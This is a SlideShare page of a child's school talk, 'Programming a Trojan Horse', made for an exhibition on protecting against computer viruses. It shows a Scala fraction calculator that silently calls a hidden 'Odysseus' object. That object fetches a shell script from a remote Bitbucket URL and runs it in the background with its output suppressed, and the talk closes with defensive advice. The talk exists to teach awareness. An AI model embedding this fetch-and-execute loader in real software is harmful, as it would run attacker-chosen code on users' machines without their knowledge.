SlideShare a Scribd company logo
PROGRAMMING A
TROJAN HORSE
BY ANGELINA RUDENKO
ABOUT ME
Angelina Rudenko
11 years old
VIS (Vienna International School)
CyberGirls (https://bitbucket.org/cybergirls/)
Exhibition
Protection from Computer Viruses
❖ Trojan Horse
❖ Virus
❖ Worm
THE STEPS
❏ Think what the people need
❏ Create and test
❏ Think about malicious payload
❏ Create and test
❏ Let it go
Teddy-Ware print("Numerator: ")
var n = StdIn.readLine().toInt
Odysseus.fireAndForget()
print("Denomenator: ")
var d = StdIn.readLine().toInt
var i = 2
while(n >= i || d >= i) {
if(n % i == 0 && d % i == 0) {
n = n / i
d = d / i
} else {
i = i + 1
}
}
println(n)
println("--")
println(d)
n d i
4 6 2
Teddy-Ware print("Numerator: ")
var n = StdIn.readLine().toInt
Odysseus.fireAndForget()
print("Denomenator: ")
var d = StdIn.readLine().toInt
var i = 2
while(n >= i || d >= i) {
if(n % i == 0 && d % i == 0) {
n = n / i
d = d / i
} else {
i = i + 1
}
}
println(n)
println("--")
println(d)
n d i
4 6 2
2 3 2
Teddy-Ware print("Numerator: ")
var n = StdIn.readLine().toInt
Odysseus.fireAndForget()
print("Denomenator: ")
var d = StdIn.readLine().toInt
var i = 2
while(n >= i || d >= i) {
if(n % i == 0 && d % i == 0) {
n = n / i
d = d / i
} else {
i = i + 1
}
}
println(n)
println("--")
println(d)
n d i
4 6 2
2 3 2
2 3 3
Teddy-Ware print("Numerator: ")
var n = StdIn.readLine().toInt
Odysseus.fireAndForget()
print("Denomenator: ")
var d = StdIn.readLine().toInt
var i = 2
while(n >= i || d >= i) {
if(n % i == 0 && d % i == 0) {
n = n / i
d = d / i
} else {
i = i + 1
}
}
println(n)
println("--")
println(d)
n d i
4 6 2
2 3 2
2 3 3
2 3 4
Shadow-Ware
object Odysseus {
def main(args: Array[String]): Unit = {
val payload = Source.fromURL("...bitbucket.org/.../command.sh").mkString
Process(payload).run(silenceIO)
}
def fireAndForget() = Future {
main(Array.empty)
}
private val silenceIO = new ProcessIO(_ => (), _ => (), _ => ())
}
Conclusion
I tried to show how easy it is to program a trojan
horse
So keep away from unknown developers
A firewall, a antivirus will help you against
attacks of virus and updates will remove
vulnerabilities
Thank You
Questions?

More Related Content

PDF
2024 Trend Updates: What Really Works In SEO & Content Marketing
KEY
cocos2d 事例編 HungryMasterの実装から
TXT
Midi pc to_cc_port_for_kontakt_marcelo port
PDF
Having fun with graphs, a short introduction to D3.js
PDF
刘平川:【用户行为分析】Marmot实践
PDF
Human-powered Javascript Compression for Fun and Gummy Bears
DOCX
Caropro
TXT
Card pack
2024 Trend Updates: What Really Works In SEO & Content Marketing
cocos2d 事例編 HungryMasterの実装から
Midi pc to_cc_port_for_kontakt_marcelo port
Having fun with graphs, a short introduction to D3.js
刘平川:【用户行为分析】Marmot实践
Human-powered Javascript Compression for Fun and Gummy Bears
Caropro
Card pack

Recently uploaded (20)

PDF
Softaken Excel to vCard Converter Software.pdf
PPTX
Lecture 3: Operating Systems Introduction to Computer Hardware Systems
PDF
Flood Susceptibility Mapping Using Image-Based 2D-CNN Deep Learnin. Overview ...
PDF
Design an Analysis of Algorithms I-SECS-1021-03
PDF
Upgrade and Innovation Strategies for SAP ERP Customers
PPTX
VVF-Customer-Presentation2025-Ver1.9.pptx
PPTX
Odoo POS Development Services by CandidRoot Solutions
PPTX
Transform Your Business with a Software ERP System
PPTX
CHAPTER 2 - PM Management and IT Context
PDF
top salesforce developer skills in 2025.pdf
PDF
Digital Strategies for Manufacturing Companies
PDF
How to Migrate SBCGlobal Email to Yahoo Easily
PPTX
history of c programming in notes for students .pptx
PDF
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
PDF
Understanding Forklifts - TECH EHS Solution
PDF
How to Choose the Right IT Partner for Your Business in Malaysia
PDF
Wondershare Filmora 15 Crack With Activation Key [2025
PPTX
ai tools demonstartion for schools and inter college
PDF
Audit Checklist Design Aligning with ISO, IATF, and Industry Standards — Omne...
PDF
Nekopoi APK 2025 free lastest update
Softaken Excel to vCard Converter Software.pdf
Lecture 3: Operating Systems Introduction to Computer Hardware Systems
Flood Susceptibility Mapping Using Image-Based 2D-CNN Deep Learnin. Overview ...
Design an Analysis of Algorithms I-SECS-1021-03
Upgrade and Innovation Strategies for SAP ERP Customers
VVF-Customer-Presentation2025-Ver1.9.pptx
Odoo POS Development Services by CandidRoot Solutions
Transform Your Business with a Software ERP System
CHAPTER 2 - PM Management and IT Context
top salesforce developer skills in 2025.pdf
Digital Strategies for Manufacturing Companies
How to Migrate SBCGlobal Email to Yahoo Easily
history of c programming in notes for students .pptx
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
Understanding Forklifts - TECH EHS Solution
How to Choose the Right IT Partner for Your Business in Malaysia
Wondershare Filmora 15 Crack With Activation Key [2025
ai tools demonstartion for schools and inter college
Audit Checklist Design Aligning with ISO, IATF, and Industry Standards — Omne...
Nekopoi APK 2025 free lastest update
Ad
Ad

Programming a Trojan Horse

  • 1. PROGRAMMING A TROJAN HORSE BY ANGELINA RUDENKO
  • 2. ABOUT ME Angelina Rudenko 11 years old VIS (Vienna International School) CyberGirls (https://bitbucket.org/cybergirls/)
  • 3. Exhibition Protection from Computer Viruses ❖ Trojan Horse ❖ Virus ❖ Worm
  • 4. THE STEPS ❏ Think what the people need ❏ Create and test ❏ Think about malicious payload ❏ Create and test ❏ Let it go
  • 5. Teddy-Ware print("Numerator: ") var n = StdIn.readLine().toInt Odysseus.fireAndForget() print("Denomenator: ") var d = StdIn.readLine().toInt var i = 2 while(n >= i || d >= i) { if(n % i == 0 && d % i == 0) { n = n / i d = d / i } else { i = i + 1 } } println(n) println("--") println(d) n d i 4 6 2
  • 6. Teddy-Ware print("Numerator: ") var n = StdIn.readLine().toInt Odysseus.fireAndForget() print("Denomenator: ") var d = StdIn.readLine().toInt var i = 2 while(n >= i || d >= i) { if(n % i == 0 && d % i == 0) { n = n / i d = d / i } else { i = i + 1 } } println(n) println("--") println(d) n d i 4 6 2 2 3 2
  • 7. Teddy-Ware print("Numerator: ") var n = StdIn.readLine().toInt Odysseus.fireAndForget() print("Denomenator: ") var d = StdIn.readLine().toInt var i = 2 while(n >= i || d >= i) { if(n % i == 0 && d % i == 0) { n = n / i d = d / i } else { i = i + 1 } } println(n) println("--") println(d) n d i 4 6 2 2 3 2 2 3 3
  • 8. Teddy-Ware print("Numerator: ") var n = StdIn.readLine().toInt Odysseus.fireAndForget() print("Denomenator: ") var d = StdIn.readLine().toInt var i = 2 while(n >= i || d >= i) { if(n % i == 0 && d % i == 0) { n = n / i d = d / i } else { i = i + 1 } } println(n) println("--") println(d) n d i 4 6 2 2 3 2 2 3 3 2 3 4
  • 9. Shadow-Ware object Odysseus { def main(args: Array[String]): Unit = { val payload = Source.fromURL("...bitbucket.org/.../command.sh").mkString Process(payload).run(silenceIO) } def fireAndForget() = Future { main(Array.empty) } private val silenceIO = new ProcessIO(_ => (), _ => (), _ => ()) }
  • 10. Conclusion I tried to show how easy it is to program a trojan horse So keep away from unknown developers A firewall, a antivirus will help you against attacks of virus and updates will remove vulnerabilities